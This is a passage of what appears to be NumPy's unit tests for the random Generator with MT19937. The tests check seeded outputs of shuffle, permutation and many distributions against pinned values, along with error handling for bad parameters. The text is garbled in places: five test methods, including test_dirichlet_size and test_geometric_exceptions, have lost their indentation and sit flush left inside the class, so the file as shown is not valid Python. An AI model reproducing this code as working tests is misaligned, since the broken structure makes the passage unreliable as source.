    def test_bytes(self):
        """Seeded bytes() reproduces a pinned byte string."""
        random = Generator(MT19937(self.seed))
        actual = random.bytes(10)
        desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
        assert_equal(actual, desired)
    def test_shuffle(self):
        """shuffle() gives the same pinned permutation across container
        and dtype conversions of the same input."""
        # Test lists, arrays (of various dtypes), and multidimensional
        # versions of both, c-contiguous or not:
        for conv in [lambda x: np.array([]),
                     lambda x: x,
                     lambda x: np.asarray(x).astype(np.int8),
                     lambda x: np.asarray(x).astype(np.float32),
                     lambda x: np.asarray(x).astype(np.complex64),
                     lambda x: np.asarray(x).astype(object),
                     lambda x: [(i, i) for i in x],
                     lambda x: np.asarray([[i, i] for i in x]),
                     lambda x: np.vstack([x, x]).T,
                     # gh-11442
                     lambda x: (np.asarray([(i, i) for i in x],
                                           [("a", int), ("b", int)])
                                .view(np.recarray)),
                     # gh-4270
                     lambda x: np.asarray([(i, i) for i in x],
                                          [("a", object, (1,)),
                                           ("b", np.int32, (1,))])]:
            random = Generator(MT19937(self.seed))
            alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
            random.shuffle(alist)
            actual = alist
            desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
            assert_array_equal(actual, desired)
    def test_shuffle_custom_axis(self):
        """Shuffling along axis=1 and axis=-1 gives the same pinned result."""
        random = Generator(MT19937(self.seed))
        actual = np.arange(16).reshape((4, 4))
        random.shuffle(actual, axis=1)
        desired = np.array([[ 0, 3, 1, 2],
                            [ 4, 7, 5, 6],
                            [ 8, 11, 9, 10],
                            [12, 15, 13, 14]])
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        actual = np.arange(16).reshape((4, 4))
        random.shuffle(actual, axis=-1)
        assert_array_equal(actual, desired)
    def test_shuffle_axis_nonsquare(self):
        """Shuffling axis=1 equals shuffling the transpose's axis=0."""
        y1 = np.arange(20).reshape(2, 10)
        y2 = y1.copy()
        random = Generator(MT19937(self.seed))
        random.shuffle(y1, axis=1)
        random = Generator(MT19937(self.seed))
        random.shuffle(y2.T)
        assert_array_equal(y1, y2)
    def test_shuffle_masked(self):
        """Shuffling masked arrays must preserve the unmasked data as a
        multiset (gh-3263)."""
        # gh-3263
        a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
        b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
        a_orig = a.copy()
        b_orig = b.copy()
        for i in range(50):
            random.shuffle(a)
            assert_equal(
                sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
            random.shuffle(b)
            assert_equal(
                sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
    def test_shuffle_exceptions(self):
        """Bad axis values and non-array inputs raise the right errors."""
        random = Generator(MT19937(self.seed))
        arr = np.arange(10)
        assert_raises(np.AxisError, random.shuffle, arr, 1)
        arr = np.arange(9).reshape((3, 3))
        assert_raises(np.AxisError, random.shuffle, arr, 3)
        assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
        arr = [[1, 2, 3], [4, 5, 6]]
        assert_raises(NotImplementedError, random.shuffle, arr, 1)
    def test_permutation(self):
        """permutation() reproduces pinned orders for lists, 2-D arrays
        and integers; non-array-like inputs raise AxisError."""
        random = Generator(MT19937(self.seed))
        alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
        actual = random.permutation(alist)
        desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
        actual = random.permutation(arr_2d)
        assert_array_equal(actual, np.atleast_2d(desired).T)
        bad_x_str = "abcd"
        assert_raises(np.AxisError, random.permutation, bad_x_str)
        bad_x_float = 1.2
        assert_raises(np.AxisError, random.permutation, bad_x_float)
        random = Generator(MT19937(self.seed))
        integer_val = 10
        desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
        actual = random.permutation(integer_val)
        assert_array_equal(actual, desired)
    def test_permutation_custom_axis(self):
        """Permuting along axis=1 and axis=-1 gives the same pinned result."""
        a = np.arange(16).reshape((4, 4))
        desired = np.array([[ 0, 3, 1, 2],
                            [ 4, 7, 5, 6],
                            [ 8, 11, 9, 10],
                            [12, 15, 13, 14]])
        random = Generator(MT19937(self.seed))
        actual = random.permutation(a, axis=1)
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        actual = random.permutation(a, axis=-1)
        assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
    def test_beta(self):
        """Seeded beta() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.beta(.1, .9, size=(3, 2))
        desired = np.array(
            [[1.083029353267698e-10, 2.449965303168024e-11],
             [2.397085162969853e-02, 3.590779671820755e-08],
             [2.830254190078299e-04, 1.744709918330393e-01]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_binomial(self):
        """Seeded binomial() (with float n) reproduces pinned values for
        both array and scalar calls."""
        random = Generator(MT19937(self.seed))
        actual = random.binomial(100.123, .456, size=(3, 2))
        desired = np.array([[42, 41],
                            [42, 48],
                            [44, 50]])
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        actual = random.binomial(100.123, .456)
        desired = 42
        assert_array_equal(actual, desired)
    def test_chisquare(self):
        """Seeded chisquare() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.chisquare(50, size=(3, 2))
        desired = np.array([[32.9850547060149, 39.0219480493301],
                            [56.2006134779419, 57.3474165711485],
                            [55.4243733880198, 55.4209797925213]])
        assert_array_almost_equal(actual, desired, decimal=13)
    def test_dirichlet(self):
        """Seeded dirichlet() reproduces pinned values; negative alpha
        raises; a scalar-size call matches the first pinned sample."""
        random = Generator(MT19937(self.seed))
        alpha = np.array([51.72840233779265162, 39.74494232180943953])
        actual = random.dirichlet(alpha, size=(3, 2))
        desired = np.array([[[0.5439892869558927, 0.45601071304410745],
                             [0.5588917345860708, 0.4411082654139292 ]],
                            [[0.5632074165063435, 0.43679258349365657],
                             [0.54862581112627, 0.45137418887373015]],
                            [[0.49961831357047226, 0.5003816864295278 ],
                             [0.52374806183482, 0.47625193816517997]]])
        assert_array_almost_equal(actual, desired, decimal=15)
        bad_alpha = np.array([5.4e-01, -1.0e-16])
        assert_raises(ValueError, random.dirichlet, bad_alpha)
        random = Generator(MT19937(self.seed))
        alpha = np.array([51.72840233779265162, 39.74494232180943953])
        actual = random.dirichlet(alpha)
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
    def test_dirichlet_alpha_non_contiguous(self):
        """A strided alpha gives the same result as its contiguous copy."""
        a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
        alpha = a[::2]
        random = Generator(MT19937(self.seed))
        non_contig = random.dirichlet(alpha, size=(3, 2))
        random = Generator(MT19937(self.seed))
        contig = random.dirichlet(np.ascontiguousarray(alpha),
                                  size=(3, 2))
        assert_array_almost_equal(non_contig, contig)
    def test_dirichlet_small_alpha(self):
        """Tiny alpha concentrates all mass on the largest component."""
        eps = 1.0e-9  # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
        alpha = eps * np.array([1., 1.0e-3])
        random = Generator(MT19937(self.seed))
        actual = random.dirichlet(alpha, size=(3, 2))
        expected = np.array([
            [[1., 0.],
             [1., 0.]],
            [[1., 0.],
             [1., 0.]],
            [[1., 0.],
             [1., 0.]]
        ])
        assert_array_almost_equal(actual, expected, decimal=15)
    @pytest.mark.slow
    def test_dirichlet_moderately_small_alpha(self):
        """Sample mean approximates the exact mean for small alpha."""
        # Use alpha.max() < 0.1 to trigger stick breaking code path
        alpha = np.array([0.02, 0.04, 0.03])
        exact_mean = alpha / alpha.sum()
        random = Generator(MT19937(self.seed))
        sample = random.dirichlet(alpha, size=20000000)
        sample_mean = sample.mean(axis=0)
        assert_allclose(sample_mean, exact_mean, rtol=1e-3)
    def test_exponential(self):
        """Seeded exponential() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.exponential(1.1234, size=(3, 2))
        desired = np.array([[0.098845481066258, 1.560752510746964],
                            [0.075730916041636, 1.769098974710777],
                            [1.488602544592235, 2.49684815275751 ]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_exponential_0(self):
        """scale=0 is allowed (returns 0); negative zero scale raises."""
        assert_equal(random.exponential(scale=0), 0)
        assert_raises(ValueError, random.exponential, scale=-0.)
    def test_f(self):
        """Seeded f() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.f(12, 77, size=(3, 2))
        desired = np.array([[0.461720027077085, 1.100441958872451],
                            [1.100337455217484, 0.91421736740018 ],
                            [0.500811891303113, 0.826802454552058]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_gamma(self):
        """Seeded gamma() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.gamma(5, 3, size=(3, 2))
        desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
                            [18.73983605132985, 19.57961681699238],
                            [18.17897755150825, 18.17653912505234]])
        assert_array_almost_equal(actual, desired, decimal=14)
    def test_gamma_0(self):
        """shape=scale=0 is allowed (returns 0); negative zeros raise."""
        assert_equal(random.gamma(shape=0, scale=0), 0)
        assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
    def test_geometric(self):
        """Seeded geometric() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.geometric(.123456789, size=(3, 2))
        desired = np.array([[ 1, 10],
                            [ 1, 12],
                            [ 9, 10]])
        assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
    def test_gumbel(self):
        """Seeded gumbel() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
        desired = np.array([[ 4.688397515056245, -0.289514845417841],
                            [ 4.981176042584683, -0.633224272589149],
                            [-0.055915275687488, -0.333962478257953]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_gumbel_0(self):
        """scale=0 is allowed (returns 0); negative zero scale raises."""
        assert_equal(random.gumbel(scale=0), 0)
        assert_raises(ValueError, random.gumbel, scale=-0.)
    def test_hypergeometric(self):
        """Seeded hypergeometric() reproduces pinned values; the
        degenerate nbad=0 and ngood=0 cases are deterministic."""
        random = Generator(MT19937(self.seed))
        actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
        desired = np.array([[ 9, 9],
                            [ 9, 9],
                            [10, 9]])
        assert_array_equal(actual, desired)
        # Test nbad = 0
        actual = random.hypergeometric(5, 0, 3, size=4)
        desired = np.array([3, 3, 3, 3])
        assert_array_equal(actual, desired)
        actual = random.hypergeometric(15, 0, 12, size=4)
        desired = np.array([12, 12, 12, 12])
        assert_array_equal(actual, desired)
        # Test ngood = 0
        actual = random.hypergeometric(0, 5, 3, size=4)
        desired = np.array([0, 0, 0, 0])
        assert_array_equal(actual, desired)
        actual = random.hypergeometric(0, 15, 12, size=4)
        desired = np.array([0, 0, 0, 0])
        assert_array_equal(actual, desired)
    def test_laplace(self):
        """Seeded laplace() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
        desired = np.array([[-3.156353949272393, 1.195863024830054],
                            [-3.435458081645966, 1.656882398925444],
                            [ 0.924824032467446, 1.251116432209336]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_laplace_0(self):
        """scale=0 is allowed (returns 0); negative zero scale raises."""
        assert_equal(random.laplace(scale=0), 0)
        assert_raises(ValueError, random.laplace, scale=-0.)
    def test_logistic(self):
        """Seeded logistic() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
        desired = np.array([[-4.338584631510999, 1.890171436749954],
                            [-4.64547787337966 , 2.514545562919217],
                            [ 1.495389489198666, 1.967827627577474]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_lognormal(self):
        """Seeded lognormal() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
        desired = np.array([[ 0.0268252166335, 13.9534486483053],
                            [ 0.1204014788936, 2.2422077497792],
                            [ 4.2484199496128, 12.0093343977523]])
        assert_array_almost_equal(actual, desired, decimal=13)
    def test_lognormal_0(self):
        """sigma=0 is allowed (returns 1); negative zero sigma raises."""
        assert_equal(random.lognormal(sigma=0), 1)
        assert_raises(ValueError, random.lognormal, sigma=-0.)
    def test_logseries(self):
        """Seeded logseries() reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.logseries(p=.923456789, size=(3, 2))
        desired = np.array([[14, 17],
                            [3, 18],
                            [5, 1]])
        assert_array_equal(actual, desired)
    def test_logseries_exceptions(self):
        """NaN p (scalar or array) must raise ValueError."""
        with np.errstate(invalid='ignore'):
            assert_raises(ValueError, random.logseries, np.nan)
            assert_raises(ValueError, random.logseries, [np.nan] * 10)
    def test_multinomial(self):
        """Multinomial draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
        desired = np.array([[[1, 5, 1, 6, 4, 3],
                             [4, 2, 6, 2, 4, 2]],
                            [[5, 3, 2, 6, 3, 1],
                             [4, 4, 0, 2, 3, 7]],
                            [[6, 3, 1, 5, 3, 2],
                             [5, 5, 3, 1, 2, 4]]])
        assert_array_equal(actual, desired)
    @pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
    def test_multivariate_normal(self, method):
        """Reference draws, covariance validation and degenerate-covariance
        behavior for each factorization method.

        Note the reference values below are identical for all three methods.
        """
        random = Generator(MT19937(self.seed))
        mean = (.123456789, 10)
        cov = [[1, 0], [0, 1]]
        size = (3, 2)
        actual = random.multivariate_normal(mean, cov, size, method=method)
        desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
                             [-0.9967333370066214, 10.342002097029821 ]],
                            [[ 0.7850019631242964, 11.181113712443013 ],
                             [ 0.8901349653255224, 8.873825399642492 ]],
                            [[ 0.7130260107430003, 9.551628690083056 ],
                             [ 0.7127098726541128, 11.991709234143173 ]]])
        assert_array_almost_equal(actual, desired, decimal=15)
        # Check for default size, was raising deprecation warning
        actual = random.multivariate_normal(mean, cov, method=method)
        desired = np.array([0.233278563284287, 9.424140804347195])
        assert_array_almost_equal(actual, desired, decimal=15)
        # Check that non symmetric covariance input raises exception when
        # check_valid='raise' if using default svd method.
        mean = [0, 0]
        cov = [[1, 2], [1, 2]]
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='raise')
        # Check that non positive-semidefinite covariance warns with
        # RuntimeWarning
        cov = [[1, 2], [2, 1]]
        assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
        assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
                     method='eigh')
        # cholesky has no way to "warn": the factorization simply fails
        assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                      method='cholesky')
        # and that it doesn't warn with RuntimeWarning check_valid='ignore'
        assert_no_warnings(random.multivariate_normal, mean, cov,
                           check_valid='ignore')
        # and that it raises with RuntimeWarning check_valid='raise'
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='raise')
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='raise', method='eigh')
        # check degenerate samples from singular covariance matrix
        cov = [[1, 1], [1, 1]]
        if method in ('svd', 'eigh'):
            # singular covariance forces both components to coincide
            samples = random.multivariate_normal(mean, cov, size=(3, 2),
                                                 method=method)
            assert_array_almost_equal(samples[..., 0], samples[..., 1],
                                      decimal=6)
        else:
            assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                          method='cholesky')
        # a valid float32 covariance must not trigger any warning
        cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
        with suppress_warnings() as sup:
            random.multivariate_normal(mean, cov, method=method)
            w = sup.record(RuntimeWarning)
            assert len(w) == 0
        mu = np.zeros(2)
        cov = np.eye(2)
        # invalid check_valid keyword
        # NOTE(review): `mean` ([0, 0]) is passed here rather than `mu`;
        # the values are identical, so behavior is unaffected.
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='other')
        # shape-validation errors: mean must be 1-D, cov must be square 2-D
        assert_raises(ValueError, random.multivariate_normal,
                      np.zeros((2, 1, 1)), cov)
        assert_raises(ValueError, random.multivariate_normal,
                      mu, np.empty((3, 2)))
        assert_raises(ValueError, random.multivariate_normal,
                      mu, np.eye(3))
    @pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
    def test_multivariate_normal_basic_stats(self, method):
        """Sample mean/covariance of 1000 draws roughly match the parameters."""
        random = Generator(MT19937(self.seed))
        n_s = 1000
        mean = np.array([1, 2])
        cov = np.array([[2, 1], [1, 2]])
        s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
        s_center = s - mean
        cov_emp = (s_center.T @ s_center) / (n_s - 1)
        # these are pretty loose and are only designed to detect major errors
        assert np.all(np.abs(s_center.mean(-2)) < 0.1)
        assert np.all(np.abs(cov_emp - cov) < 0.2)
    def test_negative_binomial(self):
        """Negative-binomial draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
        desired = np.array([[543, 727],
                            [775, 760],
                            [600, 674]])
        assert_array_equal(actual, desired)
    def test_negative_binomial_exceptions(self):
        """NaN p must be rejected on both the scalar and the array path."""
        with np.errstate(invalid='ignore'):
            assert_raises(ValueError, random.negative_binomial, 100, np.nan)
            assert_raises(ValueError, random.negative_binomial, 100,
                          [np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
    def test_noncentral_chisquare(self):
        """Noncentral chi-square reference draws, including the small-df
        (df < 1) branch and the nonc=0 (central) degenerate case."""
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
        desired = np.array([[ 1.70561552362133, 15.97378184942111],
                            [13.71483425173724, 20.17859633310629],
                            [11.3615477156643 , 3.67891108738029]])
        assert_array_almost_equal(actual, desired, decimal=14)
        # df < 1 exercises a different sampling algorithm
        actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
        desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
                            [1.14554372041263e+00, 1.38187755933435e-03],
                            [1.90659181905387e+00, 1.21772577941822e+00]])
        assert_array_almost_equal(actual, desired, decimal=14)
        # nonc=0 reduces to the central chi-square
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
        desired = np.array([[0.82947954590419, 1.80139670767078],
                            [6.58720057417794, 7.00491463609814],
                            [6.31101879073157, 6.30982307753005]])
        assert_array_almost_equal(actual, desired, decimal=14)
    def test_noncentral_f(self):
        """Noncentral F draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
                                     size=(3, 2))
        desired = np.array([[0.060310671139 , 0.23866058175939],
                            [0.86860246709073, 0.2668510459738 ],
                            [0.23375780078364, 1.88922102885943]])
        assert_array_almost_equal(actual, desired, decimal=14)
    def test_noncentral_f_nan(self):
        """A NaN noncentrality propagates to a NaN draw rather than raising."""
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
        assert np.isnan(actual)
    def test_normal(self):
        """Normal draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
        desired = np.array([[-3.618412914693162, 2.635726692647081],
                            [-2.116923463013243, 0.807460983059643],
                            [ 1.446547137248593, 2.485684213886024]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_normal_0(self):
        """scale=0 degenerates to loc (default 0); negative zero scale is rejected."""
        assert_equal(random.normal(scale=0), 0)
        assert_raises(ValueError, random.normal, scale=-0.)
    def test_pareto(self):
        """Pareto draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.pareto(a=.123456789, size=(3, 2))
        desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
                            [7.2640150889064703e-01, 3.4650454783825594e+05],
                            [4.5852344481994740e+04, 6.5851383009539105e+07]])
        # For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
        # matrix differs by 24 nulps. Discussion:
        # https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
        # Consensus is that this is probably some gcc quirk that affects
        # rounding but not in any important way, so we just use a looser
        # tolerance on this test:
        np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
    def test_poisson(self):
        """Poisson draws from a fixed MT19937 seed match reference values
        (all zero because lam is tiny)."""
        random = Generator(MT19937(self.seed))
        actual = random.poisson(lam=.123456789, size=(3, 2))
        desired = np.array([[0, 0],
                            [0, 0],
                            [0, 0]])
        assert_array_equal(actual, desired)
    def test_poisson_exceptions(self):
        """Negative, overflowing and NaN lam are rejected on scalar and array paths."""
        lambig = np.iinfo('int64').max  # far above the supported lam maximum
        lamneg = -1
        assert_raises(ValueError, random.poisson, lamneg)
        assert_raises(ValueError, random.poisson, [lamneg] * 10)
        assert_raises(ValueError, random.poisson, lambig)
        assert_raises(ValueError, random.poisson, [lambig] * 10)
        with np.errstate(invalid='ignore'):
            assert_raises(ValueError, random.poisson, np.nan)
            assert_raises(ValueError, random.poisson, [np.nan] * 10)
    def test_power(self):
        """Power-distribution draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.power(a=.123456789, size=(3, 2))
        desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
                            [2.482442984543471e-10, 1.527108843266079e-01],
                            [8.188283434244285e-02, 3.950547209346948e-01]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_rayleigh(self):
        """Rayleigh draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.rayleigh(scale=10, size=(3, 2))
        desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
                            [ 4.19850651287094, 17.08718809823704],
                            [14.7907457708776 , 15.85545333419775]])
        assert_array_almost_equal(actual, desired, decimal=14)
    def test_rayleigh_0(self):
        """scale=0 degenerates to 0; negative zero scale is rejected."""
        assert_equal(random.rayleigh(scale=0), 0)
        assert_raises(ValueError, random.rayleigh, scale=-0.)
    def test_standard_cauchy(self):
        """Standard Cauchy draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_cauchy(size=(3, 2))
        desired = np.array([[-1.489437778266206, -3.275389641569784],
                            [ 0.560102864910406, -0.680780916282552],
                            [-1.314912905226277, 0.295852965660225]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_standard_exponential(self):
        """Standard exponential draws (inverse-CDF method) match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_exponential(size=(3, 2), method='inv')
        desired = np.array([[0.102031839440643, 1.229350298474972],
                            [0.088137284693098, 1.459859985522667],
                            [1.093830802293668, 1.256977002164613]])
        assert_array_almost_equal(actual, desired, decimal=15)
    # NOTE(review): "expoential" is a typo but renaming would change the
    # collected test id, so the name is kept for stability.
    def test_standard_expoential_type_error(self):
        """Only float32/float64 dtypes are supported; int32 must raise TypeError."""
        assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
    def test_standard_gamma(self):
        """Standard gamma draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_gamma(shape=3, size=(3, 2))
        desired = np.array([[0.62970724056362, 1.22379851271008],
                            [3.899412530884 , 4.12479964250139],
                            [3.74994102464584, 3.74929307690815]])
        assert_array_almost_equal(actual, desired, decimal=14)
    # NOTE(review): "gammma" is a typo but renaming would change the
    # collected test id, so the name is kept for stability.
    def test_standard_gammma_scalar_float(self):
        """A scalar float32 draw matches the reference value at float32 precision."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_gamma(3, dtype=np.float32)
        desired = 2.9242148399353027
        assert_array_almost_equal(actual, desired, decimal=6)
    def test_standard_gamma_float(self):
        """Same stream as test_standard_gamma, checked at reduced precision."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_gamma(shape=3, size=(3, 2))
        desired = np.array([[0.62971, 1.2238 ],
                            [3.89941, 4.1248 ],
                            [3.74994, 3.74929]])
        assert_array_almost_equal(actual, desired, decimal=5)
    # NOTE(review): "gammma" is a typo but renaming would change the
    # collected test id, so the name is kept for stability.
    def test_standard_gammma_float_out(self):
        """Filling a float32 `out` array yields the same stream, with or
        without an explicit matching `size`."""
        actual = np.zeros((3, 2), dtype=np.float32)
        random = Generator(MT19937(self.seed))
        random.standard_gamma(10.0, out=actual, dtype=np.float32)
        desired = np.array([[10.14987, 7.87012],
                            [ 9.46284, 12.56832],
                            [13.82495, 7.81533]], dtype=np.float32)
        assert_array_almost_equal(actual, desired, decimal=5)
        # explicit size= consistent with out.shape must produce the same draws
        random = Generator(MT19937(self.seed))
        random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
        assert_array_almost_equal(actual, desired, decimal=5)
    def test_standard_gamma_unknown_type(self):
        """Unsupported dtypes (here int32) must raise TypeError."""
        assert_raises(TypeError, random.standard_gamma, 1.,
                      dtype='int32')
    def test_out_size_mismatch(self):
        """`size` disagreeing with `out.shape` (in size or rank) must raise."""
        out = np.zeros(10)
        assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
                      out=out)
        assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
                      out=out)
    def test_standard_gamma_0(self):
        """shape=0 degenerates to 0; negative zero shape is rejected."""
        assert_equal(random.standard_gamma(shape=0), 0)
        assert_raises(ValueError, random.standard_gamma, shape=-0.)
    def test_standard_normal(self):
        """Standard normal draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_normal(size=(3, 2))
        desired = np.array([[-1.870934851846581, 1.25613495182354 ],
                            [-1.120190126006621, 0.342002097029821],
                            [ 0.661545174124296, 1.181113712443012]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_standard_normal_unsupported_type(self):
        """Only float32/float64 dtypes are supported; int32 must raise TypeError."""
        assert_raises(TypeError, random.standard_normal, dtype=np.int32)
    def test_standard_t(self):
        """Student's t draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.standard_t(df=10, size=(3, 2))
        desired = np.array([[-1.484666193042647, 0.30597891831161 ],
                            [ 1.056684299648085, -0.407312602088507],
                            [ 0.130704414281157, -2.038053410490321]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_triangular(self):
        """Triangular draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.triangular(left=5.12, mode=10.23, right=20.34,
                                   size=(3, 2))
        desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
                            [ 7.68152445215983, 14.36169131136546],
                            [13.16105603911429, 13.72341621856971]])
        assert_array_almost_equal(actual, desired, decimal=14)
    def test_uniform(self):
        """Uniform draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
        desired = np.array([[2.13306255040998 , 7.816987531021207],
                            [2.015436610109887, 8.377577533009589],
                            [7.421792588856135, 7.891185744455209]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_uniform_range_bounds(self):
        """Ranges whose width overflows a double must raise OverflowError;
        a range just inside the representable width must succeed."""
        fmin = np.finfo('float').min
        fmax = np.finfo('float').max
        func = random.uniform
        assert_raises(OverflowError, func, -np.inf, 0)
        assert_raises(OverflowError, func, 0, np.inf)
        assert_raises(OverflowError, func, fmin, fmax)
        assert_raises(OverflowError, func, [-np.inf], [0])
        assert_raises(OverflowError, func, [0], [np.inf])
        # (fmax / 1e17) - fmin is within range, so this should not throw
